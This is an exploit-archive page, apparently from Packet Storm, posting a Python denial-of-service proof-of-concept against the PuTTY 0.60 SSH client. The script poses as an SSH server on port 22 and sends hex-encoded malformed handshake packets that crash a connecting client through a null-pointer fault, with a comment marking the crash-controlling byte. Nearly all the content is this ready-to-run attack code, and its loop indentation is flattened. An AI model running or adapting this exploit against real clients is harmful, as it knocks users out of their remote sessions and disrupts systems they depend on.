exploit the possibilities

Putty 0.60 Denial Of Service

Putty 0.60 Denial Of Service
Posted Dec 25, 2011
Authored by Level

Putty version 0.60 null pointer denial of service exploit.

tags | exploit, denial of service
MD5 | 3271b87d227673d7a62251ddb754096f

Putty 0.60 Denial Of Service

Change Mirror Download
print "\n"
print "----------------------------------------------------------------"
print "| putty 0.60 Null Ptr |"
print "| Level Smash the Stack |"
print "----------------------------------------------------------------"
print "\n"

import sys, socket, binascii
HOST = sys.argv[1]
PORT = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
buf = [
("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),
("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"
"e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"
"10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"
"362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"
"96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"
"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"
"33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"
"32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"
"d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"
"22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
"d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
"d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"
"111001111111111111111111111111111"), ## The 00 controls the crash
("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"
"64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"
"76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"
"85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"
"000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"
"3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"
"a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"
"f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"
"3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"
"b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"
"75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"
"20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"
"6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"
"ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"
"cac4453d629a47d000000000000000000"),
("0000000c0a15a1640000c32700008e14")
]


i = 0
for i in range(0,len(buf)):
conn.send(binascii.unhexlify(buf[i]))
i+=1
conn.close()
s.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    13 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close